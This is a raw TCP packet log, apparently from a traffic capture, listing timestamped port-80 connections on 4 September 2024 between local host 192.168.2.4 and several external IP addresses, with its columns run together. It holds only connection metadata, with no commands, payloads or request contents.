                  Sep 4, 2024 09:36:51.255377054 CEST8049753206.119.82.116192.168.2.4
                  Sep 4, 2024 09:36:51.255428076 CEST4975380192.168.2.4206.119.82.116
                  Sep 4, 2024 09:36:51.258668900 CEST4975380192.168.2.4206.119.82.116
                  Sep 4, 2024 09:36:51.263432026 CEST8049753206.119.82.116192.168.2.4
                  Sep 4, 2024 09:36:56.301368952 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.306181908 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.306384087 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.317368984 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.322182894 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901293993 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901365995 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901376963 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901386976 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901397943 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901411057 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901434898 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.901532888 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901549101 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901561022 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901570082 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.901573896 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.901597977 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.901623964 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:56.906225920 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.906238079 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.906248093 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.906263113 CEST804975466.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:56.906325102 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:57.828161955 CEST4975480192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:58.840034962 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:58.844929934 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:58.845031977 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:58.855741978 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:58.860620975 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591449022 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591536999 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591553926 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591564894 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591576099 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591593027 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591605902 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591608047 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591617107 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591634989 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591635942 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591635942 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591653109 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591672897 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591711044 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.596539021 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596550941 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596561909 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596575022 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596587896 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.596617937 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:00.368001938 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.388530970 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.393374920 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.393439054 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.406809092 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.411660910 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411672115 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411689043 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411696911 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411704063 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411833048 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411854982 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411880016 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411889076 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032790899 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032810926 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032818079 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032823086 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032830954 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032933950 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032944918 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032957077 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032959938 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033020973 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033020973 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033037901 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.033061981 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039434910 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.039450884 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039463043 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039473057 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039504051 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.044302940 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.914897919 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:03.965692997 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:03.970783949 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:03.970853090 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.015805006 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.020812035 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569159031 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569180012 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569190025 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569200993 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569217920 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569228888 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569240093 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569283009 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569293976 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569305897 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569335938 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.569434881 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.574182034 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.574220896 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.574234009 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.575494051 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.577429056 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.582207918 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:09.901802063 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.906800985 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:09.906862020 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.917349100 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.922164917 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.520262957 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.520303965 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.521148920 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:11.430546999 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.449377060 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.454302073 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:12.456543922 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.467273951 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.472111940 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213840008 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213860989 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213870049 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213917971 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:13.213917971 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:13.977492094 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:14.995584011 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.000669003 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.001426935 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.011987925 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.016786098 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016796112 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016872883 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016881943 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016887903 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016942024 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016949892 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016989946 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016999006 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711798906 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711815119 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711823940 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711879015 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:16.525377989 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.542634964 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.547518015 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:17.547594070 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.554378986 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.559164047 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200239897 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200257063 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200707912 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200994015 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:18.203457117 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:18.208215952 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:24.010704041 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.015542984 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.015603065 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.025834084 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.030841112 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906677008 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906693935 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906702995 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906717062 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906727076 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906738043 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906785011 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.906831980 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:25.539880991 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.561384916 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.566247940 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:26.569469929 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.579575062 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.588922977 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457389116 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457405090 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457416058 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457427979 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457441092 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457453966 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:27.457488060 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:28.087001085 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.106096983 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.111088037 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.111155033 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.123729944 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.129125118 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129136086 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129153013 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129160881 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129168987 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129673958 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129682064 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129720926 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129729986 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109544039 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109559059 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109569073 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109941959 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109978914 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.113456011 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.312815905 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.312908888 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.312969923 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.313204050 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.634057999 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.660988092 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.665873051 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:31.665931940 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.677473068 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.683084011 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553404093 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553422928 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553436041 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553447962 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553461075 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553548098 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.553627014 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.557380915 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.562155962 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:45.743464947 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.748267889 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:45.748337030 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.760468006 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.765259981 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.410078049 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.410183907 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.411505938 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:47.274362087 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.293404102 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.298516035 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:48.301503897 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.313395023 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.318252087 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057904005 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057925940 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057934999 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.061389923 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:49.821177959 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.840095043 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.845006943 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.845498085 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.855351925 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.860375881 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860380888 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860389948 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860394001 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860398054 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860409021 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860413074 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860421896 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860424995 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763303995 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763482094 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763525963 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:52.369407892 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.387459993 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.392509937 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:53.392627001 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.400991917 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.405817986 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042309046 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042391062 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042562008 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:54.045105934 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:54.049863100 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:59.089406013 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.094245911 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.094439983 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.105942965 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.110770941 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808926105 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808948040 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808959961 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808970928 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808983088 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808994055 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808995962 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809011936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809022903 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809029102 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809037924 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809042931 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809051037 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809066057 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809094906 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.813962936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813975096 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813987970 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813997030 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.814009905 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.814037085 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904623032 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904721022 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904727936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904742002 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904753923 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904759884 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904766083 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904779911 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904808044 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905069113 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905236006 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905246973 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905260086 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905272961 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905275106 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905299902 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905812979 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905824900 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905837059 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905853033 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905878067 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905898094 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905919075 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905929089 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905961990 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906753063 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906768084 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906778097 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906794071 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906814098 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906816959 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906826973 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906838894 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906869888 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.907711983 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.907752037 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.909512043 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.961750984 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000783920 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000797987 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000816107 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000827074 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000844002 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000855923 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000858068 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000866890 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000873089 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000880957 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000891924 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000910044 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000911951 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000922918 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000931025 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000933886 CEST8049770162.55.254.209192.168.2.4
